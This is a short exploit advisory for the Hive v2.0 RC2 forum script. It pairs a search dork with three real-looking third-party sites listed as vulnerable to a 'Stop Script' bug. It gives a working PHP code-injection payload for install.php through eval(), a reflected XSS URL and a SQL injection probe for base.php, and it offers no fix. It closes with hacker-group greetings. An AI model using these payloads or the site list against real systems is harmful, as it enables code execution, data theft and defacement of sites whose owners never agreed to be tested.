| # Title : Hive v2.0 RC2 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : "Powered by DigitalHive" | # Tested on: windows 8.1 Français V.(Pro) | # Bug : Stop Script | # Download : http:///www.digitalhive.com ======================================= Stop SCript working : monocircus.free.fr/Forum/install/install.php?var=finish sgdf.rodez.free.fr/forum/index.php espace-associatif.org/forum/install/install.php PHP code injection : Vulnerability description This script is vulnerable to PHP code injection. PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code. This vulnerability affects /hive/install/install.php. Attack details URL encoded POST input base was set to ${@print(md5(test))} Possible execution result: 63c19a6da79816b21429e5bb262daed8 Xss : http://localhost//hive/base.php?mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php SQL injection : This vulnerability affects /hive/base.php. Attack details URL encoded POST input location was set to 1'" Error message found: supplied argument is not a valid MySQL result Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net ---------------------------------------------------------------------------------------------------------------